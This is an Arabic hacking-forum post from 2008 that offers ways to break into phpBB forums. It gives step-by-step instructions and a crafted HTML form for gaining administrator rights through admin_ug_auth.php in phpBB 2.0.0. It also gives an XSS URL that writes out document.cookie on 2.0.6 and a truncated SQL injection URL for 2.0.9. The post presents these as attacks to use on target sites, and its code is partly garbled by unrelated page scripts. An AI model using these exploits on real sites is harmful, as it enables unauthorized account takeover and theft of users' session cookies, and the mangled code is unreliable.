موقع عشاق التحدى
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


تجد هنا كل ما هو جديد
 
الرئيسيةالبوابةأحدث الصورالتسجيلدخول

 

 احث ثغرات للمنتديات phpbb

اذهب الى الأسفل 
كاتب الموضوعرسالة
هكرز2010
المدير العام
المدير العام
هكرز2010


ذكر
عدد الرسائل : 61
العمر : 43
البروفيل المشَخَّص :
احث ثغرات للمنتديات phpbb Left_bar_bleue100 / 100100 / 100احث ثغرات للمنتديات phpbb Right_bar_bleue

الاسمة : احث ثغرات للمنتديات phpbb Dcsdff10
تاريخ التسجيل : 26/12/2007

احث ثغرات للمنتديات phpbb Empty
مُساهمةموضوع: احث ثغرات للمنتديات phpbb   احث ثغرات للمنتديات phpbb Icon_minitimeالإثنين أبريل 14, 2008 2:24 pm

(((بســـــم الله الرحمـــــــــن الرحيــــــــــــــم )
اليوم اقدم لــــكم بعض طرق اختراق منتديات phpbb



ثغرة خطيرة من منتدى من نوع
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها

كود PHP:



******>

action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php">
User Level:




User Number:




Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc.

******** src="http://www.google-analytics.com/urchin.js" type="text/**********">
***********
******** type="text/**********">
_uacct = "UA-3303329-1";
urchinTracker();
***********







عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory
اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك



::::::::
ثغره فى الاصدار Powered by phpBB 2.0.6

كل ما عليك تطبق الكود
http://www.xxxxx.com/php/index.php?category_rows[0
كود PHP:
][cat_id]=1&category_rows[0][cat_title]=waraxe********>document.write(document·cookie);&category_rows[0][cat_order]=99


ثغره فى الاصدار Powered by phpBB 2.0.9

كل ما عليك هو تطبق هذا الكود


كود PHP:
http://www.xxxxx.com/privmsg.php?fo...20LIMI T%201/*
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://222z.ahlamontada.com
 
احث ثغرات للمنتديات phpbb
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
موقع عشاق التحدى :: قسم اختراق لعالم الهكرز :: اختراق المواقع والمنتديات-
انتقل الى: